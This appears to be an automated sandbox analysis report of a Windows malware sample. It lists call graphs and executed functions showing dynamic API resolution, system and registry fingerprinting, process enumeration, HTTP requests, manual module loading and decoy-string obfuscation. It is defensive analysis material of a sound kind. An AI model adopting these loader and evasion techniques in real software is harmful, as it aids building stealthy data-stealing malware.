15336 ef0874 15334->15336 15373 ef096b 15334->15373 15337 ee1590 lstrcpy 15335->15337 15338 efa740 lstrcpy 15336->15338 15339 ef080c 15337->15339 15341 ef0881 15338->15341 15342 efa7a0 lstrcpy 15339->15342 15340 ef099c StrCmpCA 15343 ef09ab 15340->15343 15344 ef0a2d 15340->15344 15345 efa9b0 4 API calls 15341->15345 15346 ef0823 15342->15346 15347 ee1590 lstrcpy 15343->15347 15344->13753 15348 ef08ac 15345->15348 15349 efa7a0 lstrcpy 15346->15349 15350 ef09f4 15347->15350 15351 efa920 3 API calls 15348->15351 15352 ef083e 15349->15352 15353 efa7a0 lstrcpy 15350->15353 15354 ef08b3 15351->15354 16047 eefb00 15352->16047 15356 ef0a0d 15353->15356 15357 efa9b0 4 API calls 15354->15357 15358 efa7a0 lstrcpy 15356->15358 15359 ef08ba 15357->15359 15360 ef0a28 15358->15360 16163 ef0030 15360->16163 15373->15340 15695 efa7a0 lstrcpy 15694->15695 15696 ee1683 15695->15696 15697 efa7a0 lstrcpy 15696->15697 15698 ee1695 15697->15698 15699 efa7a0 lstrcpy 15698->15699 15700 ee16a7 15699->15700 15701 efa7a0 lstrcpy 15700->15701 15702 ee15a3 15701->15702 15702->14576 15704 ee47c6 15703->15704 15705 ee4838 lstrlen 15704->15705 15729 efaad0 15705->15729 15707 ee4848 InternetCrackUrlA 15708 ee4867 15707->15708 15708->14653 15710 efa740 lstrcpy 15709->15710 15711 ef8b74 15710->15711 15712 efa740 lstrcpy 15711->15712 15713 ef8b82 GetSystemTime 15712->15713 15714 ef8b99 15713->15714 15715 efa7a0 lstrcpy 15714->15715 15716 ef8bfc 15715->15716 15716->14668 15720 efa931 15717->15720 15718 efa988 15719 efa7a0 lstrcpy 15718->15719 15721 efa994 15719->15721 15720->15718 15722 efa968 lstrcpy lstrcat 15720->15722 15721->14671 15722->15718 15723->14786 15725 ee4eee 15724->15725 15726 ee9af9 LocalAlloc 15724->15726 15725->14674 15725->14676 15726->15725 15727 ee9b14 CryptStringToBinaryA 15726->15727 15727->15725 15728 ee9b39 LocalFree 15727->15728 15728->15725 15729->15707 15730->14796 15731->14937 15732->14939 15733->14947 15862 ef77a0 15734->15862 15737 ef76c6 RegOpenKeyExA 15738 ef76e7 RegQueryValueExA 15737->15738 15739 ef7704 RegCloseKey 15737->15739 15738->15739 15740 ef1c1e 15739->15740 15740->15029 15742 ef1c99 15741->15742 15742->15043 15744 ef1e09 15743->15744 15744->15085 15746 ef7a9a wsprintfA 15745->15746 15747 ef1e84 15745->15747 15746->15747 15747->15099 15749 ef7b4d 15748->15749 15750 ef1efe 15748->15750 15869 ef8d20 LocalAlloc CharToOemW 15749->15869 15750->15113 15753 efa740 lstrcpy 15752->15753 15754 ef7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15753->15754 15763 ef7c25 15754->15763 15755 ef7d18 15757 ef7d1e LocalFree 15755->15757 15758 ef7d28 15755->15758 15756 ef7c46 GetLocaleInfoA 15756->15763 15757->15758 15759 efa7a0 lstrcpy 15758->15759 15762 ef7d37 15759->15762 15760 efa8a0 lstrcpy 15760->15763 15761 efa9b0 lstrcpy lstrlen lstrcpy lstrcat 15761->15763 15762->15126 15763->15755 15763->15756 15763->15760 15763->15761 15765 ef2008 15764->15765 15765->15141 15767 ef94b5 15766->15767 15768 ef9493 GetModuleFileNameExA CloseHandle 15766->15768 15769 efa740 lstrcpy 15767->15769 15768->15767 15770 ef2091 15769->15770 15770->15156 15772 ef7e68 RegQueryValueExA 15771->15772 15773 ef2119 15771->15773 15774 ef7e8e RegCloseKey 15772->15774 15773->15170 15774->15773 15776 ef7fb9 GetLogicalProcessorInformationEx 15775->15776 15777 ef7fd8 GetLastError 15776->15777 15778 ef8029 15776->15778 15785 ef8022 15777->15785 15787 ef7fe3 15777->15787 15783 ef89f0 2 API calls 15778->15783 15781 ef89f0 2 API calls 15782 ef2194 15781->15782 15782->15184 15784 ef807b 15783->15784 15784->15785 15786 ef8084 wsprintfA 15784->15786 15785->15781 15785->15782 15786->15782 15787->15776 15787->15782 15870 ef89f0 15787->15870 15873 ef8a10 GetProcessHeap RtlAllocateHeap 15787->15873 15789 ef220f 15788->15789 15789->15198 15791 ef89b0 15790->15791 15792 ef814d GlobalMemoryStatusEx 15791->15792 15793 ef8163 __aulldiv 15792->15793 15794 ef819b wsprintfA 15793->15794 15795 ef2289 15794->15795 15795->15212 15797 ef87fb GetProcessHeap RtlAllocateHeap wsprintfA 15796->15797 15799 efa740 lstrcpy 15797->15799 15800 ef230b 15799->15800 15800->15226 15802 efa740 lstrcpy 15801->15802 15808 ef8229 15802->15808 15803 ef8263 15805 efa7a0 lstrcpy 15803->15805 15804 efa9b0 lstrcpy lstrlen lstrcpy lstrcat 15804->15808 15806 ef82dc 15805->15806 15806->15243 15807 efa8a0 lstrcpy 15807->15808 15808->15803 15808->15804 15808->15807 15810 efa740 lstrcpy 15809->15810 15811 ef835c RegOpenKeyExA 15810->15811 15812 ef83ae 15811->15812 15813 ef83d0 15811->15813 15814 efa7a0 lstrcpy 15812->15814 15815 ef83f8 RegEnumKeyExA 15813->15815 15816 ef8613 RegCloseKey 15813->15816 15825 ef83bd 15814->15825 15817 ef843f wsprintfA RegOpenKeyExA 15815->15817 15818 ef860e 15815->15818 15819 efa7a0 lstrcpy 15816->15819 15820 ef8485 RegCloseKey RegCloseKey 15817->15820 15821 ef84c1 RegQueryValueExA 15817->15821 15818->15816 15819->15825 15822 efa7a0 lstrcpy 15820->15822 15823 ef84fa lstrlen 15821->15823 15824 ef8601 RegCloseKey 15821->15824 15822->15825 15823->15824 15826 ef8510 15823->15826 15824->15818 15825->15269 15827 efa9b0 4 API calls 15826->15827 15828 ef8527 15827->15828 15829 efa8a0 lstrcpy 15828->15829 15830 ef8533 15829->15830 15831 efa9b0 4 API calls 15830->15831 15832 ef8557 15831->15832 15833 efa8a0 lstrcpy 15832->15833 15834 ef8563 15833->15834 15835 ef856e RegQueryValueExA 15834->15835 15835->15824 15836 ef85a3 15835->15836 15837 efa9b0 4 API calls 15836->15837 15838 ef85ba 15837->15838 15839 efa8a0 lstrcpy 15838->15839 15840 ef85c6 15839->15840 15841 efa9b0 4 API calls 15840->15841 15842 ef85ea 15841->15842 15843 efa8a0 lstrcpy 15842->15843 15844 ef85f6 15843->15844 15844->15824 15846 efa740 lstrcpy 15845->15846 15847 ef86bc CreateToolhelp32Snapshot Process32First 15846->15847 15848 ef875d CloseHandle 15847->15848 15849 ef86e8 Process32Next 15847->15849 15850 efa7a0 lstrcpy 15848->15850 15849->15848 15854 ef86fd 15849->15854 15852 ef8776 15850->15852 15851 efa9b0 lstrcpy lstrlen lstrcpy lstrcat 15851->15854 15852->15301 15853 efa8a0 lstrcpy 15853->15854 15854->15849 15854->15851 15854->15853 15856 efa7a0 lstrcpy 15855->15856 15857 ef51b5 15856->15857 15858 ee1590 lstrcpy 15857->15858 15859 ef51c6 15858->15859 15874 ee5100 15859->15874 15861 ef51cf 15861->15313 15865 ef7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15862->15865 15864 ef76b9 15864->15737 15864->15740 15866 ef7765 RegQueryValueExA 15865->15866 15867 ef7780 RegCloseKey 15865->15867 15866->15867 15868 ef7793 15867->15868 15868->15864 15869->15750 15871 ef8a0c 15870->15871 15872 ef89f9 GetProcessHeap HeapFree 15870->15872 15871->15787 15872->15871 15873->15787 15875 efa7a0 lstrcpy 15874->15875 15876 ee5119 15875->15876 15877 ee47b0 2 API calls 15876->15877 15878 ee5125 15877->15878 16034 ef8ea0 15878->16034 15880 ee5184 15881 ee5192 lstrlen 15880->15881 15882 ee51a5 15881->15882 15883 ef8ea0 4 API calls 15882->15883 15884 ee51b6 15883->15884 15885 efa740 lstrcpy 15884->15885 15886 ee51c9 15885->15886 15887 efa740 lstrcpy 15886->15887 15888 ee51d6 15887->15888 15889 efa740 lstrcpy 15888->15889 15890 ee51e3 15889->15890 15891 efa740 lstrcpy 15890->15891 15892 ee51f0 15891->15892 15893 efa740 lstrcpy 15892->15893 15894 ee51fd InternetOpenA StrCmpCA 15893->15894 15895 ee522f 15894->15895 15896 ee58c4 InternetCloseHandle 15895->15896 15897 ef8b60 3 API calls 15895->15897 15903 ee58d9 codecvt 15896->15903 15898 ee524e 15897->15898 15899 efa920 3 API calls 15898->15899 15900 ee5261 15899->15900 15901 efa8a0 lstrcpy 15900->15901 15902 ee526a 15901->15902 15904 efa9b0 4 API calls 15902->15904 15907 efa7a0 lstrcpy 15903->15907 15905 ee52ab 15904->15905 15906 efa920 3 API calls 15905->15906 15908 ee52b2 15906->15908 15915 ee5913 15907->15915 15909 efa9b0 4 API calls 15908->15909 15910 ee52b9 15909->15910 15911 efa8a0 lstrcpy 15910->15911 15912 ee52c2 15911->15912 15913 efa9b0 4 API calls 15912->15913 15914 ee5303 15913->15914 15916 efa920 3 API calls 15914->15916 15915->15861 15917 ee530a 15916->15917 15918 efa8a0 lstrcpy 15917->15918 15919 ee5313 15918->15919 15920 ee5329 InternetConnectA 15919->15920 15920->15896 15921 ee5359 HttpOpenRequestA 15920->15921 15923 ee58b7 InternetCloseHandle 15921->15923 15924 ee53b7 15921->15924 15923->15896 15925 efa9b0 4 API calls 15924->15925 15926 ee53cb 15925->15926 15927 efa8a0 lstrcpy 15926->15927 15928 ee53d4 15927->15928 15929 efa920 3 API calls 15928->15929 15930 ee53f2 15929->15930 15931 efa8a0 lstrcpy 15930->15931 15932 ee53fb 15931->15932 15933 efa9b0 4 API calls 15932->15933 15934 ee541a 15933->15934 15935 efa8a0 lstrcpy 15934->15935 15936 ee5423 15935->15936 15937 efa9b0 4 API calls 15936->15937 15938 ee5444 15937->15938 15939 efa8a0 lstrcpy 15938->15939 15940 ee544d 15939->15940 15941 efa9b0 4 API calls 15940->15941 15942 ee546e 15941->15942 16035 ef8ead CryptBinaryToStringA 16034->16035 16039 ef8ea9 16034->16039 16036 ef8ece GetProcessHeap RtlAllocateHeap 16035->16036 16035->16039 16037 ef8ef4 codecvt 16036->16037 16036->16039 16038 ef8f05 CryptBinaryToStringA 16037->16038 16038->16039 16039->15880 16043->15316 16286 ee9880 16044->16286 16046 ee98e1 16046->15323 16048 efa740 lstrcpy 16047->16048 16049 eefb16 16048->16049 16221 efa740 lstrcpy 16220->16221 16222 ef0266 16221->16222 16223 ef8de0 2 API calls 16222->16223 16224 ef027b 16223->16224 16225 efa920 3 API calls 16224->16225 16226 ef028b 16225->16226 16227 efa8a0 lstrcpy 16226->16227 16228 ef0294 16227->16228 16229 efa9b0 4 API calls 16228->16229 16230 ef02b8 16229->16230 16287 ee988e 16286->16287 16290 ee6fb0 16287->16290 16289 ee98ad codecvt 16289->16046 16293 ee6d40 16290->16293 16294 ee6d63 16293->16294 16308 ee6d59 16293->16308 16309 ee6530 16294->16309 16298 ee6dbe 16298->16308 16319 ee69b0 16298->16319 16300 ee6e2a 16301 ee6ee6 VirtualFree 16300->16301 16303 ee6ef7 16300->16303 16300->16308 16301->16303 16302 ee6f41 16306 ef89f0 2 API calls 16302->16306 16302->16308 16303->16302 16304 ee6f38 16303->16304 16305 ee6f26 FreeLibrary 16303->16305 16307 ef89f0 2 API calls 16304->16307 16305->16303 16306->16308 16307->16302 16308->16289 16310 ee6542 16309->16310 16312 ee6549 16310->16312 16329 ef8a10 GetProcessHeap RtlAllocateHeap 16310->16329 16312->16308 16313 ee6660 16312->16313 16318 ee668f VirtualAlloc 16313->16318 16315 ee6730 16316 ee673c 16315->16316 16317 ee6743 VirtualAlloc 16315->16317 16316->16298 16317->16316 16318->16315 16318->16316 16320 ee69c9 16319->16320 16324 ee69d5 16319->16324 16321 ee6a09 LoadLibraryA 16320->16321 16320->16324 16322 ee6a32 16321->16322 16321->16324 16326 ee6ae0 16322->16326 16330 ef8a10 GetProcessHeap RtlAllocateHeap 16322->16330 16324->16300 16325 ee6ba8 GetProcAddress 16325->16324 16325->16326 16326->16324 16326->16325 16327 ef89f0 2 API calls 16327->16326 16328 ee6a8b 16328->16324 16328->16327 16329->16312 16330->16328

                      Executed Functions

                      Function 00EF9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 660 ef9860-ef9874 call ef9750 663 ef987a-ef9a8e call ef9780 GetProcAddress * 21 660->663 664 ef9a93-ef9af2 LoadLibraryA * 5 660->664 663->664 666 ef9b0d-ef9b14 664->666 667 ef9af4-ef9b08 GetProcAddress 664->667 669 ef9b46-ef9b4d 666->669 670 ef9b16-ef9b41 GetProcAddress * 2 666->670 667->666 671 ef9b4f-ef9b63 GetProcAddress 669->671 672 ef9b68-ef9b6f 669->672 670->669 671->672 673 ef9b89-ef9b90 672->673 674 ef9b71-ef9b84 GetProcAddress 672->674 675 ef9b92-ef9bbc GetProcAddress * 2 673->675 676 ef9bc1-ef9bc2 673->676 674->673 675->676
                      APIs
                      • GetProcAddress.KERNEL32(76F70000,016807C8), ref: 00EF98A1
                      • GetProcAddress.KERNEL32(76F70000,01680798), ref: 00EF98BA
                      • GetProcAddress.KERNEL32(76F70000,01680678), ref: 00EF98D2
                      • GetProcAddress.KERNEL32(76F70000,01680690), ref: 00EF98EA
                      • GetProcAddress.KERNEL32(76F70000,01680600), ref: 00EF9903
                      • GetProcAddress.KERNEL32(76F70000,01688A58), ref: 00EF991B
                      • GetProcAddress.KERNEL32(76F70000,01676960), ref: 00EF9933
                      • GetProcAddress.KERNEL32(76F70000,016765C0), ref: 00EF994C
                      • GetProcAddress.KERNEL32(76F70000,016807B0), ref: 00EF9964
                      • GetProcAddress.KERNEL32(76F70000,01680528), ref: 00EF997C
                      • GetProcAddress.KERNEL32(76F70000,01680558), ref: 00EF9995
                      • GetProcAddress.KERNEL32(76F70000,01680630), ref: 00EF99AD
                      • GetProcAddress.KERNEL32(76F70000,016765E0), ref: 00EF99C5
                      • GetProcAddress.KERNEL32(76F70000,016805E8), ref: 00EF99DE
                      • GetProcAddress.KERNEL32(76F70000,01680618), ref: 00EF99F6
                      • GetProcAddress.KERNEL32(76F70000,01676640), ref: 00EF9A0E
                      • GetProcAddress.KERNEL32(76F70000,016806A8), ref: 00EF9A27
                      • GetProcAddress.KERNEL32(76F70000,016808B8), ref: 00EF9A3F
                      • GetProcAddress.KERNEL32(76F70000,016767C0), ref: 00EF9A57
                      • GetProcAddress.KERNEL32(76F70000,01680828), ref: 00EF9A70
                      • GetProcAddress.KERNEL32(76F70000,01676620), ref: 00EF9A88
                      • LoadLibraryA.KERNEL32(016808A0,?,00EF6A00), ref: 00EF9A9A
                      • LoadLibraryA.KERNEL32(01680840,?,00EF6A00), ref: 00EF9AAB
                      • LoadLibraryA.KERNEL32(01680858,?,00EF6A00), ref: 00EF9ABD
                      • LoadLibraryA.KERNEL32(01680888,?,00EF6A00), ref: 00EF9ACF
                      • LoadLibraryA.KERNEL32(01680870,?,00EF6A00), ref: 00EF9AE0
                      • GetProcAddress.KERNEL32(76DA0000,016808D0), ref: 00EF9B02
                      • GetProcAddress.KERNEL32(75840000,01680810), ref: 00EF9B23
                      • GetProcAddress.KERNEL32(75840000,01688C10), ref: 00EF9B3B
                      • GetProcAddress.KERNEL32(753A0000,01688D18), ref: 00EF9B5D
                      • GetProcAddress.KERNEL32(77300000,01676680), ref: 00EF9B7E
                      • GetProcAddress.KERNEL32(774D0000,01688AE8), ref: 00EF9B9F
                      • GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 00EF9BB6
                      Strings
                      • NtQueryInformationProcess, xrefs: 00EF9BAA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: NtQueryInformationProcess
                      • API String ID: 2238633743-2781105232
                      • Opcode ID: cb34b070d0d4b620791b477185652954cd4af618fae50acacc67131238996088
                      • Instruction ID: cac5d8da244e654139a4d5ea8325ca203d9d01ec4386d6b2bfd3a6c9e2b41dca
                      • Opcode Fuzzy Hash: cb34b070d0d4b620791b477185652954cd4af618fae50acacc67131238996088
                      • Instruction Fuzzy Hash: FFA12BB5500640BFD37CDFA8F688A6637F9FB4C202714453AE626C3A4CE67A94E1CB54
                      Function 00EE45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 764 ee45c0-ee4695 RtlAllocateHeap 781 ee46a0-ee46a6 764->781 782 ee474f-ee47a9 VirtualProtect 781->782 783 ee46ac-ee474a 781->783 783->781
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EE460F
                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00EE479C
                      Strings
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE46CD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE4713
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE45C7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE466D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE4622
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE4734
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE4662
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE45E8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE45DD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE4617
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE4683
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE477B
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE45D2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE462D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE4678
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE46C2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE4770
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE46D8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE471E
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE473F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE4657
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE4765
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE4638
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE45F3
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE4729
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE475A
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE4643
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE46B7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE46AC
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE474F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeapProtectVirtual
                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                      • API String ID: 1542196881-2218711628
                      • Opcode ID: 979e6038ac58d9a01d4cd153c985f8e235f796ec0bfd5f74312c1dacc0186e9d
                      • Instruction ID: 68862fde5b699ae52c597474e95ceebc3243278f48c1f0719ebeedbc4cce38db
                      • Opcode Fuzzy Hash: 979e6038ac58d9a01d4cd153c985f8e235f796ec0bfd5f74312c1dacc0186e9d
                      • Instruction Fuzzy Hash: D541EF607D7706AADB24FBE4C84FA9E77566FC2B10F506040B908522F6CEF0A5087B27
                      Function 00EE4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
